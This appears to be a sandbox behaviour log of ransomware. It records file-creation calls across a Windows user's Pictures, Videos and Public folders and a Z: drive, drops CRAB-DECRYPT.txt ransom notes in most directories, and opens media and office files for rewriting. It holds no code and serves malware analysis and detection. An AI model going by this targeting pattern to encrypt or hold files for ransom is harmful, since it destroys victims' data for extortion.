Create Z:\30yCZTi8h1x.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\4sHYt1PZi2kf6WB Yio.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\7blSwi6 bzIYzalyCH.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\90 LAKKb8MCrS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\90 LAKKb8MCrS\BTVMj1YZkz_L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\90 LAKKb8MCrS\OtJtmd5OKPOGSV.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\AF ELxZt.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\hRpeMa7SM_JlY\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\hRpeMa7SM_JlY\dsm FADw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\zKrYkW7P9h.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\hRpeMa7SM_JlY\u5laif2gx_ ExgVR.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\FNX1KY3uQNJM.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\g5xE-kCe400N.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\WgZ209V6i5TMyq9IY.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\ntf8-Qny2wH4n07.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\y4sU31V.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\1qsQJw5gi.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\3AmzVOB.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\UX0CIrthkmniE.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\EfPM3dZRh.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\fYfmGknK PI.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\Camera Roll\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\DYUmLcxN.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\lntr0HHuhYtnp-.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\QVpUXBjfw.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\aWJXG7BTk6.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\XvsUo.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\haBoE0.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\yUtPCopr3.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\Saved Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\AIWfKT0Hj1zN0p.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\OUzRKAK.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\E1G0z.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\GjwZzYwJT3voIw.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\MZQBS.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\nAZmaw4Er41A\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\sJlVys1tFGQ_V0pAe.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Pictures\_PS6\_kqnSVMKLm1YPTlG.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Searches\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\dHSAr.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\Videos\-pw1E7K.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\Cuo6SPOjWWTGl7OOS.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\54q7Emi00InmUiBh4.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\7RcaJ-B-FulbWnBijcXE.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\2V4nNeRhoBFj576c7yH.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\iVwcNous96VML39.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\0iq_\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\0iq_\1oCEz.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\0iq_\wq0VTY0S19vaT4.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\6N8045c-SOWtMc.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\8aPatwAh6P3H4-.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\42d71SFHtTn0.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\CdaMBp8nKQu.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\fV4Fc3O\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\fV4Fc3O\gmHZ.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\fV4Fc3O\YkYfpbbQRLzkj-iDSU.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\mMxRmF1CC.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\noh4ZMY.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3bUx\QLZ1qryy.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\3WBZ.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\HK2dS 8.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\N EkZNbc1o3WN.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\cRZ0MtepZOGtVnmrc.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\uYKBTfxUAvyzIn-4.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\6 a4m\vRoQOnjztauZ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\EiMPnwUb_7vMWhYd7wv.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\MVjr4a.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\R0rwP4.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\WIq3ApVMmH.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\Y59DUvi4K\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\Y59DUvi4K\0LjUzOYL0mzm_UXICi_Z.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\Nu17HJT.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\mZk5bgskOhvBE8C8CFq\Y59DUvi4K\Mzuva081Ecml_PBXx.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\x9hlPaP1ozUu.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\M7iYqPEbNDAkD6K.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\PVcWLp.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\Pz0WplIg7eOK1qIe0.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\u4ggu.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\Videos\Xu9u_e.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\AccountPictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Libraries\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\DTxMcdBSiMydDh.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Public\Libraries\RecordedTV.library-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\PD2J8WWYx87xI0ZI.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\T8EpXefSMHECv.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Pwx0NeK5H26N3X7a.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\N56ssz.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\FwXHW.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\BQFGGXzv3.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Dj56CGtKFxmm4j0.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\uxr0VgIKyabrfeDqhyX.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\LfWkkMwiKa4.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\IT6h99wlQ8kMSRWY.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ZURHdOemF1Sio2JJg0.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\DLkdqSFl1CQPIWIFI.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\0l49yVa27V3fbp0.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\QoeoAcaeeahNH1u.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\bmZb8.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ePjafyFSVAy.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\n1oIgSCOHCUfCFKnMot5.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\mW4UoHVdQjsL.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\o31FKcUml.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Kh4ML0UlDG8G3xTW7.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\QahKCn8ueyqJ7tcTfc.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\V2B1F8D.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
